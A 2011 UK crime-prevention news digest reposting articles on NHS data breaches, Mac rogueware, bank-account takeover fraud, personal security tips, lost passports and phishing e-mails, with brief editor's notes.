"Human error has always been the largest cause of data breaches in the NHS," said Victor Almeida, senior healthcare analyst at Kable. "While it is true that some human errors are unavoidable, such as sending an e-mail to the wrong person, most could be mitigated or avoided by improving end-user legitimisation." This can mean restricting access to locations and preventing the storage of data on mobile media, replacing CDs and USB sticks with access to databases. Better authentication tools can also make a contribution, Almeida added.

Despite high numbers of incidents at some NHS organisations, eight trusts have logged five or fewer data breaches over the past three years. These include NHS Barking and Dagenham and Newham university hospital, which both recorded five from 2008-09 to present, NHS Camden and London Ambulance Service with four, and King's College hospital foundation trust, which logged just three.

The London Ambulance Service said that two of the four incidents it has logged were considered serious, with both involving the theft of patient identifiable material. This included a "small number" of patient report forms being stolen from inside a vehicle in 2010 after a member of staff left them there inside a rucksack.

The best performance among the 30 trusts responding came from the Royal National Orthopaedic hospital trust, NHS Croydon and NHS Havering. which all said that there were no reported data breaches at their organisations between 2008-09 and the present.

Additional Information

Details of the number of data breaches and locations within London :

http://www.guardian.co.uk/healthcare-network/2011/may/04/personal-data-breaches-london-nhs-trusts-data?intcmp=239

(4th May 2011)


FAKE SECURITY SOFTWARE TAKES AIM AT MAC USERS
(ComputerWorld, dated 4th May 2011 author Gregg Keizer)
www.computerworld.com

Original article : http://cwonline.computerworld.com/t/7321287/753476122/510086/0/

Scammers are distributing fake security software aimed at the Mac by taking advantage of the news that al-Qaeda leader Osama Bin Laden has been killed by U.S. forces, a security researcher said today.

A security firm that specializes in Mac software called the move "a very big step forward" for malware makers targeting Apple's users.

Phony antivirus software, dubbed "rogueware" by security experts, has long plagued people running Microsoft Windows, but this is the first time scammers have targeted the Mac with a sophisticated, professional-looking security application, said Peter James, a spokesman for Intego, a Mac-only antivirus company headquartered in France.

"This is indeed a very big step forward for Mac malware," said James.

The program, dubbed MAC Defender, is similar to existing "rogueware," the term for bogus security software that claims a personal computer is heavily infected with malware. Once installed, such software nags users with pervasive pop-ups and fake alerts until they fork over a fee to purchase the worthless program.

Until now, rogueware has been exclusively targeting Windows PCs.

That's changed, according to Kurt Baumgartner, a senior malware researcher with Moscow-based Kaspersky Lab, who today said that one group distributing MAC Defender has also been actively spreading Windows rogueware.

"They have been revving up for this for months," said Baumgartner of the work to prep MAC Defender.

Last month, Baumgartner had reported that ".co.cc" domains -- which are often used to spread malware and host attack code-infected Web sites -- had begun to host fake security sites and deliver the "Best AntiVirus 2011" rogueware.

During his early-April sweep through the .co.cc domains, Baumgartner found a URL explicitly aimed at Macs: "antispyware-macbook(dot)co(dot)cc".

"It is very odd that this group is marketing 'Fast Windows Antivirus 2011' from 'macbook' domains," Baumgartner said at the time in a blog post.

Today, Baumgartner said that a group using .co.cc domains was serving up fake security software for Macs as part of a broader campaign to trick Windows users into downloading and installing phony programs.

That campaign is currently exploiting the hot news topic of Bin Laden's death to get people to click on links that redirect their browsers to the rogueware downloads. The scammers have used "black hat" SEO (search engine optimization) tactics to push links to rogueware higher on Google Images' search results.

But that's not the only way Mac owners have been duped into installing MAC Defender.

On Saturday -- the day before President Obama announced the killing of Bin Laden -- messages from infected users began appearing on Apple's support forums.

"What is macdefender and why is it trying to install itself on my computer?" asked someone identified as "wamabahama" on April 30.

"FYI, my daughter said the program started after clicking on a 'hair style photo,'" added "Mr. Fix It Home Services" on the same support thread. Others reported stumbling upon MAC Defender after searching for images of prom tuxedos or for pictures of a character in the movie "Princess Bride."

On Monday, Intego published a detailed advisory about MAC Defender, noting that that it was "very well designed, and looks professional."

Intego spotted MAC Defender and acquired samples on Saturday, said James, who pointed out that users must enter their administrative password to install the program. "So there's still a social engineering angle here," he said.

In fact, users see a generic Windows-oriented page when they first click a link to the rogueware. "They're not even getting a Mac-specific page," James said.

But unless users have Safari set not to automatically open files after downloading, MAC Defender's installation screen opens without any user action. That's been enough to con some into approving the install by typing their administrative password.

The program also relies on an unusual technique to make users pay up.

"Every few minutes, it opens a porn page in the browser," said James of MAC Defender. "We think they're doing this because most people will assume that that means they've got a virus on their Mac, and they need to get rid of it by paying for the program."

MAC Defender demands $60-$80, depending on whether users select a one-year, two-year or lifetime "license."

Ironically, there are only eight to 10 serial numbers that MAC Defender accepts, said James, and those are tucked into the binary file -- unencrypted -- where advanced users may be able to root them out.

James also called out the MAC Defender's look and feel as an indicator that the criminals are serious about reaping profits from Mac users. "This was done by a very sophisticated Mac interface developer," James said. "It's an obvious sign that [scammers] are starting to target Macs. Earlier [scams], such as 2008's MacSweeper just didn't bother trying to look professional."

Intego spotted MacSweeper, a fake Macintosh system cleaning program, in January 2008.

MAC Defender has also created some collateral damage: The rogueware uses the same name as a legitimate German company that develops Mac software.

"A new malware application named MAC Defender (MacDefender.app) for OS X surfaced a few days ago," warned the MacDefender site. "If you see an application/installer named like this DO NOT DOWNLOAD/INSTALL it. I would never release an application named like this."

The rogueware's name choice was probably a twist on "PC Defender" and "Windows Defender," phrases used in the titles of numerous Windows-based fake AV programs, said James.

Mac users running Safari can prevent MAC Defender from automatically opening after it downloads by unchecking the box marked "Open 'safe' files after downloading" at the bottom of the General tab in the browser's Preferences screen.

Editors Note

This article describes how bogus software is being distributed by hijacking search engine results. The article is also aimed at US Mac users. This does not mean that UK ( or any other country for that matter ) Mac users will not suffer the same fate. It is surprising that searches for the "Royal Wedding" have not been hijacked. Or have they ? If you do get hijacked, close down the browser immediately, don't let the unauthorised software load.

(4th May 2011)


CYBERTHIEVES LOOT SMALL BUSINESSES AND TRANSFER MILLIONS TO FIRMS IN CHINA
(Computerworld, dated 28th April 2011 author Jaikumar Vijayan)
www.computerworld.com

Editors Note (uaware): A couple of weeks ago in a short article about my "spam inbox" I mentioned that I had received an e mail about an ACH transaction. The link within that e mail would have led to a bogus website linked to this type of fraud.

Some U.S. companies may unwittingly be helping to provide millions of dollars in illicit financing to businesses in China.

An alert from the FBI and the Financial Services Information Sharing and Analysis Center (FS-ISAC) this week warned small and midsize U.S. businesses to be on the lookout for online account takeovers and fraudulent Automated Clearing House (ACH) transactions.

The warning comes in the wake of a rash of recent incidents in which online bank accounts belonging to small and midsize businesses (SMB) were hijacked and money from them was stolen and transferred to accounts apparently held by several legitimate businesses in China's Heilongjiang province along the Russian border.

Between March and April, the FBI identified at least 20 incidents in which cybercriminals gained access to SMBs' banking credentials, such as usernames, passwords or authentication tokens, and used them to electronically wire money to accounts held by "Chinese economic and trade companies," the alert said.

The amounts of the illegal wire transfers have ranged from $50,000 to $985,000, with the majority involving sums of more than $900,000.

Many of the companies that have received the money are registered in port cities such as Raohe, Fuyuan, Jixi City, Xunke, Tongjiang and Dongning. The companies appear to be legitimately registered businesses and typically have accounts at the Agricultural Bank of China, the Industrial and Commercial Bank of China and the Bank of China, the alert said.

So far, the break-ins have siphoned $11 million out of SMB accounts. In all, the crooks have attempted to steal $20 million from SMBs in the past month, the alert warned.

Such online account takeovers are not new. The FBI, the FS-ISAC and NACHA, the body that oversees the ACH network, issued a similar warning in the fall of 2009.

At that time, the FBI said several new cases were reported weekly. In most instances, the crooks used sophisticated keystroke logging and Trojan horse programs to steal log-in credentials from company employees authorized to initiate funds transfers on behalf of their employers, the FBI noted in its 2009 alert.

The same warnings were repeated in this week's alert. The alert noted that the malware used in the recent attacks had not been identified in all cases, but at least some instances involved the ZeuS banking Trojan, the Backdoor.bot keylogger and Spybot, an IRC backdoor Trojan.

In addition, one victim reported being hit with malware that allowed hackers to completely erase the hard disk of the infected computer before any investigations could be done, the alert said.

The FBI alerts urged banks to notify customers if they notice any wire transfers destined for Raohe, Fuyuan, Jixi City, Xunke, Tongjiang or Dongning.

Avivah Litan, an analyst at Gartner, said banks need to do more to protect themselves from such attacks, especially since they are in a better position to tackle the problem.

"These attacks are using the same techniques that have been used for a couple of years against business bank accounts and more recently against enterprise systems and security companies," Litan said. "The attacks keep coming, because most banks have yet to build up sufficient defenses.

There has been speculation that the Federal Financial Institutions Examination Council (FFIEC), a standards-setting body for the financial services industry, could soon require banks to implement stronger forms of user authentication, but no action has been taken.

A Gartner survey conducted in February found that many banks continue to rely on "crude" security measures, such as cookies and secret questions, to protect online accounts, Litan said.

"Nearly two-thirds of the surveyed banks manage their fraud detection and customer authentication projects by committee, which means [security is] always someone else's responsibility. It should come as no surprise, then, that the attacks are succeeding."

Original article : http://cwonline.computerworld.com/t/7317817/930454165/509772/0/

(1st May 2011)


ALL FORCES NOW HAVE LATEST NUMBER PLATE RECOGNITION TECHNOLOGY
(NPIA, dated 26th April 2011)
www.npia.police.uk/

The latest National Police Improvement Agency (NPIA) Automatic Number Plate Recognition (ANPR) software has now been rolled out to all forces and has significantly boosted policing capability to tackle major crime and terrorism. The software, BOF II v2.3, developed by Northgate Public Services in conjunction with the NPIA, now allows all forces to share vehicle intelligence and access the National ANPR Data Centre (NADC). The centre, managed by the NPIA, receives approximately 15 million records each day. The BOF and the NADC are fully integrated with the Police National Computer (PNC), which enables officers to receive instant notification when a vehicle of interest passes a camera. The rollout, which took place between November 2010 and March 2011, followed an extended period of testing by the NPIA and pilot forces including Metropolitan Police, Essex and West Midlands.

The use of ANPR is embedded within core policing. A highly effective operational policing tool, ANPR allows police to target known offenders. Senior police officers say the technology is important in tackling crime, increasing police officer productivity and has been used in some high profile court cases, including terrorism trials. As criminals become increasingly more sophisticated in their activities, the latest ANPR software demonstrates how the NPIA is instrumental in enabling the police service to update their crime fighting capability.

NPIA policy and guidance has also safeguarded the privacy of individuals by ensuring the data may only be accessed for serious crime and on the authority of senior officers. For the past two years, the ANPR Programme Team has been working with the Association of Chief Police Officers (ACPO) and the Information Commissioner's Officers (ICO) to ensure that the use of ANPR by the police effectively balances individual privacy rights against operational requirements.

Mark Jones, Head of the ANPR Programme, NPIA said: "By adopting an open approach in working with the ICO, we have been able to produce data collection, retention and use guidelines on behalf of ACPO and then build upon existing technology to give forces a tool that enables them to address privacy concerns."

The NPIA, through its ANPR Programme, continues to enhance the effectiveness of the National ANPR Infrastructure in partnership with ACPO and in consultation with the ICO.

(1st May 2011)


HOW TO SECURE YOUR LIFE IN 12 STEPS
(ComputerWorld, dated 25th April 2011 author Nick Mediati)
www.computerworld.com
Category : crime prevention

ORIGINAL ARTICLE : http://cwonline.computerworld.com/t/7312235/753476122/509242/0/

Good security advice can be hard to find. Lots of security experts offer help, but not all of their tips are accurate or up-to-date, and many address PC security only. So even if you follow their advice, you may be more vulnerable than you think. That's where we come in. We've assembled a dozen simple but essential tips, a "12-step security program" to keep your PC, smartphone, gadgets, and identity safe. The steps are practical and fairly easy to perform, so you can strengthen your security without losing your mind in the process.

1. Use virtual credit card numbers to shop online
You have good reason to be nervous when using your credit card number to shop online. After all, you may know little or nothing about the company you're buying from, and your credit card information is at risk of being compromised in a data breach. Using a virtual credit card number is one way to make your Internet shopping excursions more secure.

Essentially a wrapper for your regular credit card or debit card account, a virtual card number is good for one use only. When you use the virtual number, the bank that supplied it charges your purchase to your regular credit or debit card, but hackers never gain access to the underlying credit card information.

Editors Note - I haven't heard of a UK financial institution offering this type of credit card facility. Another alternative is a pre-paid credit card. These cards cost around £5 to purchase and there is often a charge for Re-charging the card with money, but how much are you willing to pay for peace of mind ? These pre-paid cards can also be used on trips abroad.

2. Secure your Wi-Fi
Is your Wi-Fi network at home password-protected? If not, it should be. You might not care if your neighbors use your Wi-Fi connection to surf the Web, but someone with more sinister motives could take advantage of your generosity (and lack of protection) to gain access to data stored on your home PCs.

The easiest way to guard against Wi-Fi interlopers is to encrypt your Wi-Fi network. Afterward you'll have to enter a password whenever you connect to your Wi-Fi network, but that's a small price to pay for improved security. Most Wi-Fi routers support WEP, WPA, and WPA2 encryption standards. Be sure to use either the WPA or WPA2 encryption settings, which provide a much higher level of security than WEP encryption.

Another safeguard is to set your WIFI router not to broadcast the SSID (your network's name). With SSID broadcasting disabled, your wireless network won't be visible to computers nearby, and only people who specifically know your network's name will be able to find it. The procedure for locking down your Wi-Fi will vary depending on your router's model and manufacturer. Check the router's documentation for instructions.

Editors Note - Also check if your routers password is still set to default. If it is, that is also worth changing . Within the UK there are not that many internet service providers (ISP's) so there will be ten's of thousands of similar routers operating on their network. A great target for hackers to attack by controlling routers and altering their settings.

3. Encrypt Your Hard Drives
Hard drives and USB flash drives are treasure troves of personal data. They're also among the most common sources of data leaks. If you lose a flash drive, external hard drive, or laptop containing sensitive personal information, you will be at risk. Fortunately, encrypting your hard drive can give your data an extra layer of protection beyond setting up a system password. Encryption will conceal your drive's data and make accessing the files almost impossible for anyone who does not know your encryption password.

The Ultimate and Business editions of Windows 7 and Vista come with BitLocker, a tool that lets you encrypt your entire hard drive.  For its part, Mac OS X includes FileVault, a tool for encrypting your Mac's home folder; Lion, the next major Mac OS X release on the horizon, will be able to encrypt a whole hard drive.


4. Keep Your Software Up-to-Date
One of the simplest but most important security precautions you should take is to keep your PC's software up-to-date. I'm not talking exclusively about Windows here: Adobe, Apple, Mozilla, and other software makers periodically release fixes for various bugs and security flaws. Cybercriminals commonly exploit known vulnerabilities, and Adobe Reader is a constant target of such assaults.

Most major commercial software packages come with some sort of automatic updating feature that will inform you when a new update is available. Don't ignore these messages; install updates as soon as you can when you're prompted to do so. It's a little bit of a hassle, but it can prevent major headaches later on.

5. Upgrade to the latest antivirus software
If you're running antivirus software from two or three years ago, you should up­­grade to the most recent version, even if you still receive up-to-date malware signature files for the older edition. The underlying technology for antivirus software has im­­proved significantly in recent years.

To detect threats, antivirus products today don't rely solely on the traditional signature files (regularly updated files that identify the latest malware). They also use heuristic techniques to detect and block infections that no one has seen yet. Given how frequently new viruses crop up in the wild, the ability to protect against unknown malware is critical.

6. Lock down your smartphone
If you use your smartphone the way I use mine, your handset probably contains lots of personal information e-mail addresses, photos, phone contacts, Facebook and Twitter apps, and the like. That accumulation of valuable data makes smartphones a tempting target for thieves and cybercriminals, which is why the smartphone is shaping up as the next big security battleground.

Android phones are already being hit with Trojan horses and other types of malware, and security experts agree that mobile malware is still in its infancy. Worse, many users don't think of their phones as computers (though that's what the devices are), so they don't take the same security precautions they would with a PC. If you haven't downloaded a security app for your Android phone, you should. Most smartphone security apps are free, and it's far better to have one and never need it than to get caught off-guard and exposed without one.

Because Apple's App Store takes a more restrictive approach to apps offered for sale there, iPhone owners generally don't have to worry as much about malware, though it's always possible for something to slip through the cracks. Apple hasn't allowed any proper antivirus applications into the App Store, either, but you do have some security options.

One more tip: When choosing a mobile antivirus program, it's safest to stick with well-known brands. Otherwise, you risk getting infected by malware disguised as an antivirus app.

7. Install a link-checker plug-in
Security threats may lurk in seemingly innocuous Web pages. Legitimate sites may get hacked, cybercriminals game search engines to make sure that their infected pages come up in searches for hot topics (a technique known as "search engine poisoning"), and seemingly safe sites may harbor malware. Although you have no way to guard against these attacks completely, using a link checker can help protect you from many of them.

Link-checker tools typically show small badges next to links in search results and elsewhere to indicate whether a site is trustworthy, dangerous, or questionable. Many such tools also add a status indicator to your browser's toolbar to signal the presence of any problems with the site that you're currently visiting. Many security suites come with a link scanner.

8. Don't neglect physical security
A thief can snatch an unattended laptop from a desk and walk away in a matter of seconds. And a thief who has your laptop may have access to your files and personal information. A notebook lock won't prevent someone from cutting the cable, but it can deter crimes of opportunity.

Kensington is probably best-known for its notebook locks; it offers an array of locks for laptops and desktops. Targus is a second vendor that specializes in laptop security gear, including one lock that sounds an alarm when someone tries to pick up the attached laptop or cut the lock cable.

Prying eyes are a common security hazard. To prevent unauthorized viewing of your data when you step away from your desk, always lock your screen before leaving your PC unattended. To do this, simply hold down the Windows key and type the letter L. This will bring up the lock screen. To get back to work, press Ctrl-Alt-Delete, and enter your login password at the prompt.


9. Make HTTPS your friend
When you're browsing the Web, protect yourself by using HTTPS (Hypertext Transfer Protocol Secure) whenever possible. HTTPS encrypts the connection between your PC and the Website you're visiting. Though HTTPS doesn't guarantee that a site is secure, it can help prevent other parties from hacking into the network and gaining access to your account.

Many sites use HTTPS by default: When you purchase an item online or log in to online banking, for instance, your browser will probably connect to the site via HTTPS automatically. But you can go one step further by enabling HTTPS on Facebook, Twitter, and Gmail.

To use Facebook's HTTPS feature, log in to Facebook and click Account in the upper-right corner. Select Account Settings from the drop-down menu, and look for 'Account Security' on the resulting page. Under the Account Security heading, click Change, check the box next to Browse Facebook on a secure connection (https) whenever possible, and click Save.

For Twitter, first log in to your account. If you're using the new Twitter interface, click your account name in the upper-right part of the screen, and select settings. (If you're still using the old Twitter interface, click the Settings link in the upper right of the window.) From there, scroll down to the bottom of the resulting page, check the box next to Always use HTTPS, and click Save.

To enable HTTPS on Gmail, log in to your account, click the gear icon in the upper-right corner, and select Mail Settings from the drop-down menu. Next, under the Browser Connection heading, select the button labeled Always use https. When you're all set, scroll to the bottom of the page and click Save Changes. To learn more about Gmail security, visit Google's Gmail Security Checklist page.

10. Avoid public computers and Wi-Fi
As convenient as free Wi-Fi and publicly available computers may be at, say, a public library or café, using them can leave you and your personal information exposed. Public computers might be infected with spyware and other types of malware designed to track your movements online and harvest your passwords.

The same is true of open Wi-Fi networks. Cyberthieves may set up rogue Wi-Fi networks that look legitimate (for instance, one may be named for the café that you're visiting) but enable the crooks to collect your personal information.

Sometimes, you may have no choice but to use a public computer or Wi-Fi network. When you do, don't use it to check your e-mail or social network accounts, conduct online banking, or perform any other action that entails logging in to a site. If you have access to a VPN, use it.

11. Be password smart
You probably know already that using obvious or easy-to-discover passwords like "password" or your pet's name is a bad idea. But how can you make your passwords significantly more secure?

First, you need to use a different long, strong password for each account. Hackers often attempt to break into accounts by employing a "dictionary attack," which involves using words straight from the dictionary to guess your password. So don't use standard words as your passwords; instead, try creating them from a combination of letters, numbers, and symbols. And don't simply replace letters in a word with a symbol (for example, using the @ symbol in place of an A); it's too common a trick. You can also strengthen your passwords by using a mix of lowercase and capital letters.

Basically, the more complex a password is, the better. But try to use something that you'll be able to remember--a mnemonic of some sort that incorporates various alphanumeric symbols and that nobody but you would know.


12. Check your credit report each year
Unfortunately, even if you do everything right, bad guys might still succeed in stealing your identity. After all, you can control who has access to your personal information, but you can't control how well a company that you do business with secures its personal-data records.

Nevertheless, you can limit the damage that would result from undetected identity theft by checking your credit report regularly. Periodically checking your credit report is a good way to make sure that no one has opened credit card or bank accounts under your name. These can be obtained from major credit agencies like Equifax and Experian.


(1st May 2011)


THOUSANDS OF UK PASSPORTS "THROWN OUT WITH RUBBISH"
(BBC News, dated 22nd April 2011)
www.bbc.co.uk
Category : crime prevention

Some 10,000 passports a year are probably thrown in bins, says the UK's Identity and Passport Service (IPS).

Launching a campaign urging people to keep passports safe, it warns the same number are lost in bars and clubs.

The IPS said it had had reports of passports being stolen at gunpoint in Brazil, lost in jail, and left in the pocket of a coat donated to a tramp.

The IPS based its findings on analysis of applications for replacement passports, which cost £77.50.

Men replace more than 162,500 lost and stolen passports a year compared with about 112,000 by women, the IPS says.

Criminal gangs
 
Of all the lost and stolen passports in the UK, people in their 20s were responsible for 42.8% of the total - more than twice as many as the next nearest age group.

Those in their 30s lost 20.8% followed by people in their 40s, who lost 12.8%.

IPS chief executive Sarah Rapson warned that passports were becoming increasingly attractive to criminal gangs wanting to steal identities.

She said: "It's really important that you keep it safe both when you are at home and when you're abroad. "Remember to put your passport away after use. Don't leave it in a trouser or shirt pocket in the laundry pile."

Some of the colourful reasons given for why people were parted from their passports include:

- Taxi attacked by gunman on way to airport in Brazil
- Fell out of bag while snowboarding
- Drunk boyfriend (now ex) destroyed it
- Last seen in pocket of a coat donated to tramp
- Wallet stolen at children's party with passport inside
- Passports stored in safe in Turkish villa, thieves stole safe
- Put in bin by infant daughter; and
- Put on a fire with clothes

The service advised people to keep their passport in a place they can remember and to only carry it when absolutely necessary.

It said people should use alternatives if they needed to prove their age and should keep a note of the number to help speed up the issuing of replacements.

Lost and stolen by age

Teenagers - 6.3%
20s - 42.8%
30s - 20.8%
40s - 12.8%
50s - 10.2%
60s - 5.3%
70s - 1.6%
80s - 0.2%
Source: IPS


 Additional information

Your UK passport can be the key to so many things. Obviously for travelling outside the UK, the purchase of foreign currency, proving your ID when signing up for some utilities and just observed today..returning an unwanted Playstation to HMV for a refund ! There is so much information within a passport that can be used by criminals to steal your ID, it is not just a piece of paper.

So, keep it safe, make a note of the reference number ( that is individual to you ) and register your travel arrangements and passport reference on the Governments Foreign and Commonwealth Office (FCO) LOCATE website.

(1st May 2011)



DRUGS SLAVE SMUGGLING RING BUSTED IN EUROPE-WIDE CRACKDOWN
(Metro, dated 21st April 2011 author Ros McGuinness)
www.metro.co.uk

A slave smuggling ring believed to be behind thousands of Britain's cannabis farms has been smashed by police in a Europe-wide crackdown.

The traffickers tricked Vietnamese victims into parting with as much as £17,500 to be smuggled into Europe, falsely promising them paid work when they arrived.

But many were sold into the sex industry or ordered to work at drug farms.

The so-called 'gardeners' can cultivate an entire crop in two months.

Police claim the gang - which has also been linked with five murders - ran more than 6,500 such farms found operating in Britain last year.

Some 98 arrests have been made and 114 victims discovered across six countries since the start of the  European Union operation - called Vietnamese Organised Immigration Crime - two years ago.

Andy Baker, of the Serious Organised Crime Agency, said the arrests had helped stem the illegal activities on British soil. He added: 'It's been a success so far but other people are part of the game.

'The criminals continue on, so we must keep going, dismantling and disrupting the criminal market.'

Zoltan Boross, of Hungary's National Investigation Office, said several counterfeiters who prepared fake documents for the Vietnamese victims were being questioned.

'Their main target was Britain but the Vietnamese were also being smuggled into France and Germany,' he added.

There are an estimated 35,000  illegal Vietnamese immigrants in Britain, attracted by annual earnings that could feed a family of ten for a decade in their home country.

Authorities in Ireland, Holland,  Belgium, Italy, Poland, the Czech  Republic and Slovakia supported the operation. British police were praised by European colleagues over their role, said Mr Baker.

(1st May 2011)


DIGITAL TECHNOLOGY PREVENTS RURAL CRIME
(Thames Valley Police, dated 19th April 2011)
www.thamesvalley.police.uk
Category : crime prevention

A new DVD aimed at preventing rural crime across the South East has been launched by five police forces that have worked with partners to produce 'Shutting the Gate on Rural Crime'.

This 16-minute film, aimed at farmers and rural business people, features National Farming Union president Peter Kendall, who is a Bedfordshire farmer and has been a victim of this type of crime.

He features in the opening sequence of the DVD, which has been produced by the police forces of Thames Valley, Hampshire, Surrey, Kent and Sussex, and urges the farming community to take greater precautions to protect their businesses.

In 2010 in England, 228 plant and agricultural vehicles were stolen. In 2009, there were 254 similar offences.

Last year in England and Wales 1,975 tractors and other agricultural vehicles were stolen at a cost to NFU Mutual in excess of £10m.

NFU South East regional director William White said: "The five police forces have demonstrated enormous commitment to tackling rural crime and reaching rural businesses. We will be ensuring that NFU members in the five force areas can watch this film. They must then take vital steps to protect their property effectively and

to engage positively with police in the fight against crime."

The DVD features sections on:

Estate security
Equipment security
Counter terrorism
Wildlife crime
Animal crime
Heritage crime

'Shutting The Gate on Rural Crime' provides rural businesses with local police contacts and details of the Farm Watch scheme.

Mr White added: "The theft of farm machinery is costly and has a major impact on farmers' livelihoods. Farmers are frequently left without the tools of their trade and it is very difficult for them to replace specialist equipment.

"Farmers must become more proactive in protecting machinery, with the average modern tractor costing more than £60,000 and sometimes as much as £120,000."

ACConstable John Campbell, of Thames Valley Police (pictured), said: "We know that we have some real issues regarding rural crime, including plant theft, scrap metal theft and more recently diesel theft.  "These offences really impact on the ability of farmers and rural communities to feel safe in their homes and workplaces. There are also links with serious organised crime, as some of the stolen machinery is worth many thousands of pounds.

"This DVD contains good sound common-sense advice that, if taken, should significantly reduce both the opportunities for crime and the crime itself.

"The support of the NFU has been fundamental to the success of this project. All five forces, working closely with the NFU and members of the rural community, hope that this initiative will contribute to a fall in rural crime across the region."

Anyone would like a copy of the DVD should contact Sussex Police Community Safety and Crime Reduction Advisor, Trevor Cox, by emailing trevor.f.cox@sussex.pnn.police.uk.

The release of this film coincides with the launch in the Thames Valley Police area of a demonstration tractor with all the latest security features.

The tractor, a John Deere model, will be available to forces nationwide. It has been supported by rural insurer NFU Mutual and farm machinery dealership Farol.

(1st May 2011)



BEAT POLICE GET INSTANT ACCESS TO DATABASE RECORDING MOBILE THEFTS
(Courtesy of : Computer active, dated 14th April 2011 author Dinah Greek)
www.computeractive.co.uk
Category : crime prevention

Time-consuming checks on stolen mobile devices become faster as the National Mobile Property Register is linked to the National Police.

 

Police on the beat will now be able to search the National Mobile Property Register (NMPR) to check whether mobile devices have been stolen.

The NMPR database set up in 2004 includes data on stolen or lost mobile devices such as mobile phones, tablets, iPads and even bikes.

According to the Metropolitan Police Mobile Phone Crime Unit, mobile phone theft in particular is a significant problem. Each year more than 350,000 are stolen in the UK. Each month officers make around 25,000 searches of the NMPR register, which is run by the Metropolitan Police Service (MPS).

But this has been a time-consuming process, taking 20 minutes or longer as officers on the beat have to contact their force control room to request a search of the register.

The National Police Improvement Agency (NPIA) has now integrated the register with the Police National Computer. Using handheld computers, officers can search the database themselves.

 Detective Chief Superintendent Mick McNally of the MPS' Territorial Policing Command, said: "For the first time front-line officers can now obtain instantaneous results of searches on suspected stolen mobile phones.

"It sends a clear message to phone thieves that police and partners can identify stolen mobile phones in the hands of the thief or another individual."

People can log the details of their devices, such as IMEI and serial numbers on the Immobilise website, which links directly with the NMPR. If a device is lost or stolen, the police can identify it and return it to its rightful owner.


To avoid buying stolen property, people can use the sister site, Checkmend.

www.immobilise.com   ( Ed's Note: this is a commercial website, that is operated in support of UK Police)
www.checkmend.com/uk ( Ed's Note ; this is a commercial website, charging £1.99 / search )

(1st May 2011)


 

CONTINUING NEWS FROM MY SPAM INBOX - APRIL
Category : phishing
 
For the second month in a row I haven't received the regular adverts for various forms of pharmaceutical paraphernalia. My Internet Service Providers (ISP) spam filter has continued to do a very good job. In the last 3 weeks it has managed to filter out 5 phishing e mails and place them in a "be warned" post box.

The latest batch of phishing e-mails include :

- TD Waterhouse Investor Services - Your latest monthly statement is available online for your review. Our records indicate you have not logged in since your latest statement was posted.

To view your statement: click on the following link and provide the requested details

This is a bogus link to encourage the receipient to provide their personal details (phishing)

- NACHA payment cancellation - NACHA is the "Electronic Payment Association" of the USA. It was formed in 1974 to come up with a standardised way of electronically transfering funds between financial institutions in the US. In 2008 it dealt with 18.2 billion financial transactions. So we now know who the bonfide organisation is, so what is the scam ?

"The ACH transfer (ID: 3443214650961), recently initiated from your checking account (by you or any other person), was canceled by the other financial institution. Please click here to download further information"

This is a bogus link to encourage the receipient to provide their personal details (phishing).

- Lloyds TSB - We recently noticed one or more attempts to log in to your Lloyds TSB Internet Banking Account from a foreign IP address. Click on the "Verify my Account" link.

- UPS (United Parcel Service ) - Much the same as the bogus DHL e-mail from the previous month. Two of these e mails have been received, but quoting different notification / reference numbers.
The parcel was send to your home address. And it will arrice within 7 bussness day. More information and the tracking number are attached in linked document. ( nb. There was a document attached to this e-mail - this was probably infected with malicious software ).

As a continuing reminder - All of these e mails are bogus and are just phishing for your personal information. If you receive them, delete them immediately, do not open any attachments or click on any links. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT the contact details within these bogus e-mails.

(18th April 2011)



CONSUMER WARNING OVER TICKET RESALE WEBSITES
(The Guardian, dated 13th April 2011 author Rebecca Smithers)
www.guardian.co.uk

Music fans looking to book tickets for one of the European summer festivals and sporting events are being warned to take care in the secondary ticket market.

The resale of tickets for sold out events is big business, and with the annual festival season almost underway there are fears that hundreds of UK consumers could, as in 2010, hand over their money but end up with no ticket.

The UK European Consumer Centre (UKECC) said today that it received 288 complaints and enquiries from UK consumers during 2010 relating to EU traders under its "recreational and cultural services" category, which includes ticket problems - an increase of more than a third (34%) on the 2009 figure of 215. Hungary and the Netherlands were the countries which attracted the most complaints from Britons.

The UKECC is co-funded by the European commission and the Department for Business, Innovation and Skills, and provides advice for consumers buying goods and services. It also deals with cross-border complaints and grievances from European consumers based in other EU countries regarding UK festivals.

It singled out the following as the main areas of complaint:

• Tickets failing to be delivered. Most terms and conditions state that tickets will arrive just before the event, but if this doesn't happen the seller may be long gone.

• Cancellation of an event after the consumer has purchased a ticket. The original seller's terms and conditions usually only allow for a refund of the ticket's face value, but secondary ticket sellers may have a huge mark-up, so a consumer may only get back a fraction of what he or she paid.

• Consumers turning up at a venue only to find their ticket is declined for being void.

• Valid tickets are provided, but problems at the event on the day may lead to the consumer being refused admittance to some areas.


Jed Mayatt, UKECC manager, said: "We want consumers to be cautious when buying tickets, particularly if an event is sold out. But the temptation of a website still offering tickets is too great for some people, even if it is at inflated prices."


An example highlighted by the UKECC was a UK consumer who bought a pair of tickets to a top-flight football game from an online ticketing company in Spain, for which she paid €381.92. The tickets were not sent to her home as promised, and although the trader promised these would be hand delivered before the game this failed to happen. She sought a refund, as well as damages for consequential losses, amounting to €627.23. After liaising with European Consumer Centre in Spain she was advised to go to the police as it was thought likely to be a scam.


The UK ECC's leaflet, "Can you rely on your festival tickets?" ( go to website : www.ukecc.net/sub.asp?id=190 ), outlines how consumers could be caught out, offers advice for purchasers, and addresses the question of legal protection. Music fans are also advised to contact the European Consumer Centre for Services for more information.


UK European Consumer Centre : www.ukecc.net/
European Commission : http://ec.europa.eu/
Department for Business Innovation and Skills : www.bis.gov.uk/

(18th April 2011)


 NEW PENALTIES FOR UNINSURED DRIVERS
(CSMA* Club magazine, April 2011 edition)

New rules come into force in late Spring making it illegal to own an unisured car unless it has been declared off-road. It makes it an offence to even own an unisured vehcile, rather than just dreive one.
The new "Continuous Insurance Enforcement" rules aim to tackel the 1.4 million people who drive uninsured in Britain. According to the Motor Insurers Bureau, these drivers cost the rest of us £500 million a year as well as adding £30 to our car insurance premiums. Around 242,00 offenders are convicted yearly.
But the rules also mean there is no flexibility for those of us who perhaps only insure our sports car for the road in the Summer, and then keep it in the garage, unsured, for the rest of the year.

Under the new rules, you must either make a SORN ( Statutory Off Road Notification) that your car is off the road, or have insurance all the time. The penalty for failing to do this is :

- A letter telling you that you appear to have an unisured car that needs cover.
- If no action is taken, then a fine of £100 is levied.
